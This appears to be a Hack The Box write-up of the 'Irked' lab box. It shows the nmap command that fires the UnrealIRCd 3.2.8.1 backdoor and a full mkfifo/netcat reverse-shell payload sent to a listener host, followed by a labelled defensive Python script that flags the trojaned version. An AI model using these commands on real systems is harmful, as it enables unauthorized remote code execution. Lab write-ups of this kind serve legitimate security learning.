HTB: Irked
Irked
Irked was next after Shocker; I went in blind.
Ports
This box had four unusual ports and no standard ports. We had:
- 6697/tcp open irc UnrealIRCd
- 8067/tcp open irc UnrealIRCd
- 46013/tcp open status 1 (RPC #100024)
- 65534/tcp open irc UnrealIRCd
So it’s pretty much just UnrealIRCd, whatever that is.
Whatever that is
According to wikipedia:
UnrealIRCd is an open-source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows.
The wikipedia entry also notes:
The tarball of version 3.2.8.1, from November 2009 to June 12, 2010, contained a trojan that allowed people to execute commands with the privileges of the user running the daemon, regardless of any user restrictions. The problem was fixed - the current tarball download is not suspected to contain a trojan.
Hmmmm. Googling for the exploit reveals an nmap script that could be useful. I try it with a ping:
nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='ping 10.10.14.10' irked.htb
Success!
Now it’s just a matter of finding a shell payload that works. This one does:
nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f' irked.htb
But it’s the only one I could get to work.
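Added example, not from the original post: a defender-side triage script that parses IRC RPL_VERSION (numeric 351) replies collected from your own IRC servers and flags any UnrealIRCd reporting the 3.2.8.1 build named in the Wikipedia excerpt above. The sample replies and their exact layout are constructed assumptions (RFC 2812 gives the numeric; the `Unreal<version>.` token shape is assumed). A version match is only a triage signal: the trojan lived in the tarball, not the version number, so a package-built 3.2.8.1 may be clean and only the nmap script's active check settles it.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Build named as trojaned (Nov 2009 - Jun 2010 tarball) in the Wikipedia excerpt.
TROJANED_VERSION = "3.2.8.1"

# RFC 2812 numeric 351 RPL_VERSION:
#   ":<server> 351 <nick> <version>.<debuglevel> <server> :<comments>"
RPL_VERSION = re.compile(
    r"^:(?P<server>\S+) 351 (?P<nick>\S+) (?P<version>\S+) (?P<host>\S+)(?: :(?P<comment>.*))?$"
)
# Assumed UnrealIRCd token shape, e.g. "Unreal3.2.8.1." (trailing '.' is the
# debug-level separator from the numeric's <version>.<debuglevel> field).
UNREAL = re.compile(r"^Unreal(?P<ver>\d+(?:\.\d+)*)\.?$")

# Constructed sample replies (not captured from the box).
SAMPLE_REPLIES = [
    ":irc.example.test 351 audit Unreal3.2.8.1. irc.example.test :FhiXeOoZE [*=2309]",
    ":irc2.example.test 351 audit Unreal3.2.10.4. irc2.example.test :FhiXeOoZE [*=2309]",
    ":irc3.example.test 351 audit ircd-hybrid-8.2.24. irc3.example.test :TS6ow",
    "PING :irc.example.test",  # not a 351 reply; must be ignored
]


@dataclass
class VersionFinding:
    server: str
    software: str
    version: Optional[str]   # parsed only for UnrealIRCd
    affected: bool           # True when the reported version is the trojaned build


def parse_rpl_version(line: str) -> Optional[VersionFinding]:
    """Return a finding for one IRC line, or None if it is not a 351 reply."""
    m = RPL_VERSION.match(line.strip())
    if not m:
        return None
    token = m.group("version")
    u = UNREAL.match(token)
    if u:
        ver = u.group("ver")
        return VersionFinding(m.group("server"), "UnrealIRCd", ver, ver == TROJANED_VERSION)
    # Some other daemon: keep the raw token (minus the debug-level dot) for inventory.
    return VersionFinding(m.group("server"), token.rstrip("."), None, False)


def audit(lines: List[str]) -> List[VersionFinding]:
    """Parse every 351 reply in `lines`; non-matching lines are skipped."""
    return [f for f in (parse_rpl_version(l) for l in lines) if f is not None]


def flagged_servers(lines: List[str]) -> List[str]:
    """Servers that report the trojaned build and need an active check."""
    return [f.server for f in audit(lines) if f.affected]


if __name__ == "__main__":
    for f in audit(SAMPLE_REPLIES):
        status = "CHECK (trojaned tarball version)" if f.affected else "ok"
        print(f"{f.server:20} {f.software:12} {f.version or '-':10} {status}")
```

Feed it the 351 lines from a `VERSION` query against each server in your inventory; anything it flags is a candidate for the nmap backdoor script's check, not a confirmed compromise.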
Privesc
This was pretty easy (well, so was the foothold). Linpeas pointed out a binary, which I took a look at in Ghidra:
Here’s the privesc; it’s just about easier to show it than write it out:
Between this nmap script and another one I saw yesterday about enumerating WordPress plugins, there is more to NSE than I have been used to using.